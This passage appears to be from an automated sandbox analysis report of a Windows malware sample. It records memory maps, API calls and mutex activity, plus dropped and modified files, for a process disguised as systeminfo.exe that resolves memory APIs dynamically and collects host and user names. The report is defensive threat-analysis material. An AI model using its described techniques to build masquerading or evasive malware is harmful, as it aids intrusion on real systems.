sechost.dll	0x74e90000	0x74ea8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x750d0000	0x75126fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x75130000	0x751bffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75250000	0x75295fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x752a0000	0x7534bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x75450000	0x755abfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x755b0000	0x7564cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x756e0000	0x7577ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x75780000	0x75789fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x75790000	0x7588ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x759f0000	0x75afffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x75b00000	0x75bcbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x76b60000	0x76beefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x76d80000	0x76e6ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000076e70000	0x76e70000	0x76f69fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000076f70000	0x76f70000	0x7708efff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
ntdll.dll	0x77090000	0x77238fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77270000	0x773effff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions Download Dump
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	Readable	Region Actions

Threads

Thread 0x740

(Host: 59, Network: 0)

Category	Operation	Information	Count	Logfile
Mutex	Open	mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE	1	Fn
System	Get Time	type = Local Time, time = 2017-11-28 18:18:22 (Local Time)	1	Fn
System	Get Time	type = Ticks, time = 103678	1	Fn
Mutex	Open	mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE	1	Fn
System	Get Time	type = Local Time, time = 2017-11-28 18:18:22 (Local Time)	1	Fn
System	Get Time	type = Ticks, time = 103678	1	Fn
Mutex	Open	mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE	1	Fn
System	Get Time	type = Local Time, time = 2017-11-28 18:18:22 (Local Time)	1	Fn
System	Get Time	type = Ticks, time = 103678	1	Fn
Mutex	Open	mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE	1	Fn
System	Get Time	type = Local Time, time = 2017-11-28 18:18:22 (Local Time)	1	Fn
System	Get Time	type = Ticks, time = 103678	1	Fn
Mutex	Open	mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE	1	Fn
System	Get Time	type = Local Time, time = 2017-11-28 18:18:22 (Local Time)	1	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
Mutex	Open	mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE	1	Fn
System	Get Time	type = Local Time, time = 2017-11-28 18:18:22 (Local Time)	1	Fn
Module	Get Address	function = VirtualAlloc, ordinal = 0, address_out = 0x3df76c	1	Fn
Module	Get Address	function = VirtualAlloc, ordinal = 0, address_out = 0x3df7a4	1	Fn
Module	Get Address	function = LoadLibraryA, ordinal = 0, address_out = 0x3df814	1	Fn
Module	Get Address	function = UnmapViewOfFile, ordinal = 0, address_out = 0x3df814	1	Fn
Module	Get Address	function = GetProcAddress, ordinal = 0, address_out = 0x3df814	1	Fn
Module	Get Address	function = VirtualAlloc, ordinal = 0, address_out = 0x3df814	1	Fn
Module	Get Address	function = VirtualProtect, ordinal = 0, address_out = 0x3df814	1	Fn
Module	Get Address	function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x3df814	1	Fn
Module	Get Address	function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x3df814	1	Fn
Module	Load	module_name = msvcrt.dll, base_address = 0x752a0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\msvcrt.dll, function = strchr, address_out = 0x752adbeb	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\msvcrt.dll, function = free, address_out = 0x752a9894	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\msvcrt.dll, function = malloc, address_out = 0x752a9cee	1	Fn
Module	Load	module_name = KERNEL32.dll, base_address = 0x759f0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = FreeConsole, address_out = 0x75aa6aa8	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x75a01700	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatW, address_out = 0x75a2828e	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x75a04435	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpW, address_out = 0x75a05929	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyW, address_out = 0x75a23102	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x75a054ee	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x75a04442	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x75a01245	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x75a014b1	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameA, address_out = 0x75a1b6e0	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameExA, address_out = 0x75a842ef	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x75a05a4b	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpA, address_out = 0x75a1eceb	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x75a011c0	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x75a014e9	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x7729e026	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x75a014c9	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x75a011a9	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x75a01809	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x75a011f8	1	Fn
Module	Load	module_name = USER32.dll, base_address = 0x75790000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x757bae5f	1	Fn
Module	Load	module_name = ADVAPI32.dll, base_address = 0x756e0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameA, address_out = 0x7570a4b4	1	Fn
System	Get Computer Name	result_out = YKYD69Q	1	Fn
System	Get Computer Name	result_out = YKyd69q, type = ComputerNameDnsHostname	1	Fn

Process #7: systeminfo.exe

(Host: 315, Network: 231)

Information	Value
ID	#7
File Name	c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe
Command Line	"C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe"
Initial Working Directory	C:\Users\aETAdzjz\Desktop\
Monitor	Start Time: 00:00:41, Reason: Child Process
Unmonitor	End Time: 00:02:23, Reason: Terminated by Timeout
Monitor Duration	00:01:42

OS Process Information

Information	Value
PID	0x81c
Parent PID	0xbfc (c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Groups	YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 3F0 0x 82C 0x 84C 0x 864 0x 874 0x 884 0x 894 0x 8A4 0x 8B4 0x 8C8 0x 788 0x 720 0x 644 0x 51C 0x 968 0x 2AC

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	Readable, Writable	Region Actions
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000050000	0x00050000	0x00053fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000060000	0x00060000	0x00061fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000070000	0x00070000	0x00081fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000090000	0x00090000	0x0009dfff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x00000000000a0000	0x000a0000	0x000adfff	Private Memory	Readable, Writable	Region Actions
private_0x00000000000b0000	0x000b0000	0x000bffff	Private Memory	Readable, Writable, Executable	Region Actions
pagefile_0x00000000000c0000	0x000c0000	0x000c0fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000000d0000	0x000d0000	0x0010ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000110000	0x00110000	0x0011ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000110000	0x00110000	0x00117fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000110000	0x00110000	0x00111fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000120000	0x00120000	0x00127fff	Pagefile Backed Memory	Readable, Writable	Region Actions
windowsshell.manifest	0x00120000	0x00120fff	Memory Mapped File	Readable	Region Actions
index.dat	0x00120000	0x0012bfff	Memory Mapped File	Readable, Writable	Region Actions
pagefile_0x0000000000130000	0x00130000	0x00131fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000140000	0x00140000	0x001bffff	Private Memory	Readable, Writable	Region Actions
locale.nls	0x001c0000	0x00226fff	Memory Mapped File	Readable	Region Actions
rsaenh.dll	0x00230000	0x0026bfff	Memory Mapped File	Readable	Region Actions
rsaenh.dll	0x00230000	0x0026bfff	Memory Mapped File	Readable	Region Actions
index.dat	0x00230000	0x00237fff	Memory Mapped File	Readable, Writable	Region Actions
index.dat	0x00240000	0x0024ffff	Memory Mapped File	Readable, Writable	Region Actions
private_0x0000000000250000	0x00250000	0x00250fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000250000	0x00250000	0x00250fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000260000	0x00260000	0x0026ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000270000	0x00270000	0x0036ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000370000	0x00370000	0x00370fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000380000	0x00380000	0x00380fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000003a0000	0x003a0000	0x0049ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000004a0000	0x004a0000	0x0057efff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000590000	0x00590000	0x0059ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000005f0000	0x005f0000	0x005fffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000600000	0x00600000	0x00787fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000790000	0x00790000	0x00910fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000920000	0x00920000	0x00b1ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000920000	0x00920000	0x00a1ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000a80000	0x00a80000	0x00abffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000ae0000	0x00ae0000	0x00b1ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000b80000	0x00b80000	0x00bbffff	Private Memory	Readable, Writable	Region Actions
3292.exe	0x00be0000	0x00bfefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000c00000	0x00c00000	0x01ffffff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x02000000	0x022cefff	Memory Mapped File	Readable	Region Actions
private_0x00000000022d0000	0x022d0000	0x026a0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000022e0000	0x022e0000	0x0231ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002340000	0x02340000	0x0237ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000023a0000	0x023a0000	0x0249ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000024a0000	0x024a0000	0x0259ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000024a0000	0x024a0000	0x0251ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000024a0000	0x024a0000	0x024dffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002510000	0x02510000	0x0251ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002560000	0x02560000	0x0259ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002640000	0x02640000	0x0273ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002740000	0x02740000	0x0277ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002810000	0x02810000	0x0290ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002910000	0x02910000	0x02b3ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002930000	0x02930000	0x02a2ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002a30000	0x02a30000	0x02afffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002a30000	0x02a30000	0x02a6ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002b00000	0x02b00000	0x02b3ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002b40000	0x02b40000	0x02c3ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002cc0000	0x02cc0000	0x02dbffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002fa0000	0x02fa0000	0x02fdffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000030d0000	0x030d0000	0x031cffff	Private Memory	Readable, Writable	Region Actions
dhcpcsvc.dll	0x74210000	0x74221fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
npmproxy.dll	0x74230000	0x74237fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrtremote.dll	0x74240000	0x7424dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
netprofm.dll	0x74250000	0x742a9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
fwpuclnt.dll	0x742b0000	0x742e7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
comctl32.dll	0x742f0000	0x7448dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wship6.dll	0x744d0000	0x744d5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wshtcpip.dll	0x744e0000	0x744e4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winrnr.dll	0x744f0000	0x744f7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mswsock.dll	0x74500000	0x7453bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pnrpnsp.dll	0x74540000	0x74551fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
napinsp.dll	0x74560000	0x7456ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rasadhlp.dll	0x74570000	0x74575fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nlaapi.dll	0x74580000	0x7458ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sensapi.dll	0x74590000	0x74595fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rtutils.dll	0x745a0000	0x745acfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rasman.dll	0x745b0000	0x745c4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rasapi32.dll	0x745d0000	0x74621fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
uxtheme.dll	0x74650000	0x746cffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64cpu.dll	0x746e0000	0x746e7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64win.dll	0x746f0000	0x7474bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x74750000	0x7478efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
iphlpapi.dll	0x74790000	0x747abfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dnsapi.dll	0x747b0000	0x747f3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winspool.drv	0x74800000	0x74850fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winmm.dll	0x74860000	0x74891fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msacm32.dll	0x748a0000	0x748b3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winnsi.dll	0x748c0000	0x748c6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntmarta.dll	0x74b00000	0x74b20fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rsaenh.dll	0x74b30000	0x74b6afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x74b70000	0x74b85fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
userenv.dll	0x74b90000	0x74ba6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wtsapi32.dll	0x74bb0000	0x74bbcfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
profapi.dll	0x74bc0000	0x74bcafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x74dc0000	0x74dcbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x74dd0000	0x74e2ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x74e30000	0x74e8ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x74e90000	0x74ea8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
iertutil.dll	0x74ec0000	0x750bafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msasn1.dll	0x750c0000	0x750cbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x750d0000	0x75126fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x75130000	0x751bffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75250000	0x75295fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x752a0000	0x7534bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wininet.dll	0x75350000	0x75444fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x75450000	0x755abfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x755b0000	0x7564cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
clbcatq.dll	0x75650000	0x756d2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x756e0000	0x7577ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x75780000	0x75789fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x75790000	0x7588ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ws2_32.dll	0x75890000	0x758c4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
crypt32.dll	0x758d0000	0x759ecfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x759f0000	0x75afffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x75b00000	0x75bcbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x75c50000	0x76899fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
normaliz.dll	0x76b00000	0x76b02fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wldap32.dll	0x76b10000	0x76b54fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x76b60000	0x76beefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
urlmon.dll	0x76c40000	0x76d75fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x76d80000	0x76e6ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000076e70000	0x76e70000	0x76f69fff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x0000000076f70000	0x76f70000	0x7708efff	Private Memory	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77090000	0x77238fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nsi.dll	0x77240000	0x77245fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77270000	0x773effff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x000000007efa1000	0x7efa1000	0x7efa3fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efa4000	0x7efa4000	0x7efa6fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efa7000	0x7efa7000	0x7efa9fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efaa000	0x7efaa000	0x7efacfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efad000	0x7efad000	0x7efaffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007efd5000	0x7efd5000	0x7efd7fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efd8000	0x7efd8000	0x7efdafff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	Readable	Region Actions
For performance reasons, the remaining 63 entries are omitted. The remaining entries can be found in flog.txt.

Created Files

Filename	File Size	Hash Values	Actions
c:\programdata\fb6f.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\programdata\fb2f.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\programdata\fb70.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\programdata\fb70.tmp	0.11 KB (112 bytes)	MD5: 36427ecb2a0faf13af3047c51b29f9c5 SHA1: 9a3fb26927a7aa81255cf8abcc1f1c3e38f28c4f SHA256: ea156f649bb1180b32c6d5be76c0969941ec76d1fface734f401b5327ac57345	File Actions Show Properties Download
c:\programdata\fb2f.tmp	0.08 KB (87 bytes)	MD5: 0b5111a9cc6baab51851f1702403b937 SHA1: e95885d85bd47cc19e1181b046995ccd975fd59d SHA256: 62a0536a5b9d1e3cb2af52a5630c330cd30da7398bcddf4a17af0913fc502819	File Actions Show Properties Download

Modified Files

Filename	File Size	Hash Values	Actions
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat	48.00 KB (49152 bytes)	MD5: f3393556a7ada08dd53548e19467e11f SHA1: 6109040bf1ee76ce83597326228dd6ac1668f104 SHA256: f066cb2b19cc806d84ebeb3649da5050070a6e608156c217a5f8d1149ff8dee4	File Actions Show Properties Download
c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\index.dat	32.00 KB (32768 bytes)	MD5: 50d06047bd7adf336c6a8dd390506ff3 SHA1: ba8e1f4ec8f6aa576cf4f9b2a48587bec03b9582 SHA256: c657149342b5c59c25e0b42daeade7362989c99571979f788342e6bae0c8048e	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\microsoft\windows\history\history.ie5\index.dat	64.00 KB (65536 bytes)	MD5: 009e3e410a28a8e518f2c6ac83306724 SHA1: 121b97b6c22d60d1dedc8d0160c86e8b9afa5089 SHA256: 960f4e97d46b9ddaece01a9def1d6fe466103fa57203483b13c8eb8c26a7b6bc	File Actions Show Properties Download

Threads

Thread 0x3f0

(Host: 65, Network: 0)

Category	Operation	Information	Count	Logfile
Mutex	Open	mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE	1	Fn
System	Get Time	type = Local Time, time = 2017-11-28 18:18:23 (Local Time)	1	Fn
System	Get Time	type = Ticks, time = 105066	1	Fn
Mutex	Open	mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE	1	Fn
System	Get Time	type = Local Time, time = 2017-11-28 18:18:23 (Local Time)	1	Fn
System	Get Time	type = Ticks, time = 105082	1	Fn
Mutex	Open	mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE	1	Fn
System	Get Time	type = Local Time, time = 2017-11-28 18:18:23 (Local Time)	1	Fn
System	Get Time	type = Ticks, time = 105082	1	Fn
Mutex	Open	mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE	1	Fn
System	Get Time	type = Local Time, time = 2017-11-28 18:18:23 (Local Time)	1	Fn
System	Get Time	type = Ticks, time = 105082	1	Fn
Mutex	Open	mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE	1	Fn
